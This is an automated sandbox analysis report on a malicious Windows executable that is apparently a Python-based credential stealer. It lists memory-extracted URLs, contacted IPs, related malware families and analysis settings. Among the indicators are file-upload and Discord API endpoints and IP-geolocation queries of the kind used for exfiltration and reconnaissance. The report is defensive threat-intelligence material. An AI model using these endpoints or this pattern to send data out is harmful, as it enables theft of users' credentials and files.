  https://peps.python.org/pep-0205/ | 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AD71000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2045682909.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039094220.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2034507305.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2039896185.000001F12AD60000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399381962.000001F12AC00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048564293.000001F12AD6C000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.dr | false | | high
  http://www.microsoftNAV_CO~1.JSOy. | 9g9LZNE4bH.exe, 00000002.00000003.2397711771.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397324147.000001F12B4EF000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2397218402.000001F12B4E8000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://www.reddit.com/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://github.com/urllib3/urllib3/issues/3020 | 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE72000.00000004.00000020.00020000.00000000.sdmp | false | | high
  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000007.00000002.2190941611.000001B981DC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002A.00000002.2242595273.000001C03B381000.00000004.00000800.00020000.00000000.sdmp | false | | high
  https://www.amazon.ca/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename | 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy | 9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A6F8000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://www.ebay.co.uk/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  http://pesterbdd.com/images/Pester.png | powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
  http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmp | false | | high
  https://www.ebay.de/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
  https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code | 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://go.micro | powershell.exe, 0000002A.00000002.2242595273.000001C03C25C000.00000004.00000800.00020000.00000000.sdmp | false | | high
  https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | 9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2032706611.000001F128D69000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmp | false | | high
  https://www.amazon.com/ | 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmp | false | | high
  https://contoso.com/Icon | powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmp | false | | high
  https://support.mozilla.org/p | 9g9LZNE4bH.exe, 00000002.00000002.2401507128.000001F12B317000.00000004.00000020.00020000.00000000.sdmp | false | |
                                                                                                    high
                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://httpbin.org/9g9LZNE4bH.exe, 00000002.00000002.2400159195.000001F12B157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                          high
                                                                                                          http://www.cl.cam.ac.uk/~mgk25/iso-time.html9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br9g9LZNE4bH.exe, 00000002.00000003.2070355548.000001F12B29F000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2112269853.000001F12B31C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2111259470.000001F12B23C000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2093044186.000001F12B23C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.youtube.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://allegro.pl/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 0000002A.00000002.2242595273.000001C03B5AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l5359g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085401130.000001F12B471000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2144196309.000001F12B480000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2033778965.000001F128D5B000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://MD8.mozilla.org/1/m9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.python.org/psf/license/9g9LZNE4bH.exe, 9g9LZNE4bH.exe, 00000002.00000002.2407700677.00007FF8A8D69000.00000040.00000001.01000000.00000004.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.bbc.co.uk/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://ip-api.com/line/?fields=hostingr9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://bugzilla.mo9g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12C004000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://api.anonfiles.com/uploadr9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://tools.ietf.org/html/rfc6125#section-6.4.39g9LZNE4bH.exe, 00000002.00000002.2404785095.000001F12BF70000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000007.00000002.2190941611.000001B981FE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://google.com/mail9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://packaging.python.org/specifications/entry-points/9g9LZNE4bH.exe, 00000002.00000002.2404350121.000001F12BD40000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12ADED000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://www.google.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.iqiyi.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://foss.heptapod.net/pypy/pypy/-/issues/35399g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.9g9LZNE4bH.exe, 00000002.00000002.2401915686.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2097358541.000001F12B480000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2085401130.000001F12B471000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2144196309.000001F12B480000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://google.com/9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://api.gofile.io/getServerr9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://ocsp.sectigo.com09g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.python.org/download/releases/2.3/mro/.9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://contoso.com/Licensepowershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://discordapp.com/api/v9/users/9g9LZNE4bH.exe, 00000002.00000002.2400025008.000001F12AF00000.00000004.00001000.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398934018.000001F12A670000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://ip-api.com/json/?fields=225545r9g9LZNE4bH.exe, 00000002.00000003.2042414743.000001F12AE8D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042483409.000001F12AEA2000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2042038226.000001F12AE4E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://www.microsoftTASKLI~1.TXTy.9g9LZNE4bH.exe, 00000002.00000002.2402488296.000001F12B4F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2399154194.000001F12A900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://github.com/urllib3/urllib3/issues/29209g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#9g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data9g9LZNE4bH.exe, 00000002.00000003.2032440524.000001F12AB01000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2398637648.000001F128CF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://yahoo.com/9g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2138960524.000001F12B1CB000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2400386354.000001F12B1CD000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://account.bellmedia.c9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4FC000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-69g9LZNE4bH.exe, 00000002.00000002.2399506698.000001F12AD13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://login.microsoftonline.com9g9LZNE4bH.exe, 00000002.00000003.2137521294.000001F12BAA0000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C50C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://crl.thawte.com/ThawteTimestampingCA.crl09g9LZNE4bH.exe, 00000000.00000003.2028286503.000001A5F3611000.00000004.00000020.00020000.00000000.sdmp, rar.exe.0.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://html.spec.whatwg.org/multipage/9g9LZNE4bH.exe, 00000002.00000002.2399793593.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2143833487.000001F12AE9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://www.ifeng.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C46C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings9g9LZNE4bH.exe, 00000002.00000002.2404593794.000001F12BE50000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.zhihu.com/9g9LZNE4bH.exe, 00000002.00000002.2404950262.000001F12C4A4000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
Name | Source | Malicious | Reputation
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 9g9LZNE4bH.exe, 00000002.00000003.2395753264.000001F12B1CA000.00000004.00000020.00020000.00000000.sdmp | false | high
https://www.rfc-editor.org/rfc/rfc8259#section-8.1 | 9g9LZNE4bH.exe, 00000002.00000002.2399251946.000001F12AB14000.00000004.00000020.00020000.00000000.sdmp | false | high
https://contoso.com/ | powershell.exe, 0000002A.00000002.2291396544.000001C04B53C000.00000004.00000800.00020000.00000000.sdmp | false | high
https://oneget.orgX | powershell.exe, 0000002A.00000002.2242595273.000001C03C986000.00000004.00000800.00020000.00000000.sdmp | false | high
http://www.iana.org/time-zones/repository/tz-link.html | 9g9LZNE4bH.exe, 00000002.00000003.2048185585.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2050316287.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049688627.000001F12AE24000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048141519.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2049571529.000001F12B460000.00000004.00000020.00020000.00000000.sdmp, 9g9LZNE4bH.exe, 00000002.00000003.2048802049.000001F12AE54000.00000004.00000020.00020000.00000000.sdmp | false | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.137.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1584119
Start date and time: 2025-01-04 09:41:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 56s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 90
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 9g9LZNE4bH.exe (renamed because the original name is a hash value)
Original Sample Name: fc11fee1405cd9e4b30f6ee243396f62bcd1b1dd8117c00a7008a7e3daa6cc29.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@143/56@2/2
EGA Information:
• Successful, ratio: 60%
HCA Information:
• Successful, ratio: 51%
• Number of executed functions: 127
• Number of non-executed functions: 163
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.99, 20.12.23.50, 13.107.246.45, 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 5440 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5704 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size getting too big, too many NtCreateFile calls found
• Report size getting too big, too many NtCreateKey calls found
• Report size getting too big, too many NtEnumerateKey calls found
• Report size getting too big, too many NtOpenFile calls found
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtQueryVolumeInformationFile calls found
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:42:03 | API Interceptor | 152x Sleep call for process: powershell.exe modified
03:42:06 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
208.95.112.1 | ddos tool.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | kthiokadjg.exe | Get hash | malicious | Blackshades | Browse | ip-api.com/json/
208.95.112.1 | file.exe | Get hash | malicious | AsyncRAT, XRed, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | file.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | file.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | 23khy505ab.exe | Get hash | malicious | Njrat | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | XClient.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | Java32.exe | Get hash | malicious | XWorm | Browse | ip-api.com/line/?fields=hosting
208.95.112.1 | mcgen.exe | Get hash | malicious | Blank Grabber | Browse | ip-api.com/json/?fields=225545
208.95.112.1 | intro.avi.exe | Get hash | malicious | Quasar | Browse | ip-api.com/json/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
discord.com | AimStar.exe | Get hash | malicious | Blank Grabber | Browse | 162.159.128.233
discord.com | rename_me_before.exe | Get hash | malicious | Python Stealer, Exela Stealer | Browse | 162.159.137.232
discord.com | Fizzy Loader.exe | Get hash | malicious | Blank Grabber, Umbral Stealer | Browse | 162.159.138.232
discord.com | Jx6bD8nM4qW9sL3v.exe | Get hash | malicious | Unknown | Browse | 162.159.128.233
discord.com | dsoft.exe | Get hash | malicious | Python Stealer, Creal Stealer | Browse | 162.159.138.232
discord.com | DHL AWB-documents.lnk | Get hash | malicious | Divulge Stealer | Browse | 162.159.138.232
discord.com | http://mee6.xyz | Get hash | malicious | Unknown | Browse | 162.159.138.232
discord.com | YF3YnL4ksc.exe | Get hash | malicious | Unknown | Browse | 162.159.136.232
discord.com | YF3YnL4ksc.exe | Get hash | malicious | Unknown | Browse | 162.159.136.232
discord.com | arm.elf | Get hash | malicious | Unknown | Browse | 162.159.137.232
ip-api.com | ddos tool.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | kthiokadjg.exe | Get hash | malicious | Blackshades | Browse | 208.95.112.1
ip-api.com | file.exe | Get hash | malicious | AsyncRAT, XRed, XWorm | Browse | 208.95.112.1
ip-api.com | file.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | file.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | 23khy505ab.exe | Get hash | malicious | Njrat | Browse | 208.95.112.1
ip-api.com | XClient.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | 208.95.112.1
ip-api.com | Java32.exe | Get hash | malicious | XWorm | Browse | 208.95.112.1
ip-api.com | mcgen.exe | Get hash | malicious | Blank Grabber | Browse | 208.95.112.1
ip-api.com | intro.avi.exe | Get hash | malicious | Quasar | Browse | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS
  9cOUjp7ybm.exe | malicious | LummaC
  • 188.114.96.3
  http://livedashboardkit.info | malicious | Unknown
  • 172.67.166.199
  4.elf | malicious | Unknown
  • 1.13.111.69
  31.13.224.14-mips-2025-01-03T22_14_18.elf | malicious | Mirai
  • 1.4.15.193
  random.exe | malicious | Unknown
  • 188.114.96.3
  random.exe | malicious | Unknown
  • 188.114.96.3
  download.bin.exe | malicious | LummaC
  • 104.21.112.1
TUT-ASUS
  ddos tool.exe | malicious | XWorm
  • 208.95.112.1
  kthiokadjg.exe | malicious | Blackshades
  • 208.95.112.1
  file.exe | malicious | AsyncRAT, XRed, XWorm
  • 208.95.112.1
  file.exe | malicious | XWorm
  • 208.95.112.1
  file.exe | malicious | XWorm
  • 208.95.112.1
  23khy505ab.exe | malicious | Njrat
  • 208.95.112.1
  XClient.exe | malicious | AsyncRAT, XWorm
  • 208.95.112.1
  Java32.exe | malicious | XWorm
  • 208.95.112.1
  mcgen.exe | malicious | Blank Grabber
  • 208.95.112.1
  intro.avi.exe | malicious | Quasar
  • 208.95.112.1
No context

Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\_MEI61762\VCRUNTIME140.dll
  Holoscope-V1.3.5.exe | malicious | Unknown
  dsoft.exe | malicious | Python Stealer, Creal Stealer
  winws1.exe | malicious | Unknown
  discord.exe | malicious | Unknown
  file.exe | malicious | Unknown
  cmd.exe | malicious | Blank Grabber
  NEVER OPEN!.exe | malicious | Python Stealer, Empyrean, Discord Token Stealer
  HeilHitler.exe | malicious | Blank Grabber
  meN9qeS2DE.exe | malicious | XWorm
  client1.exe | malicious | Unknown

Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 64
Entropy (8bit): 0.34726597513537405
Encrypted: false
SSDEEP: 3:Nlll:Nll
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA1: 36E4CC7367E0C7B40F4A8ACE272941EA46373799
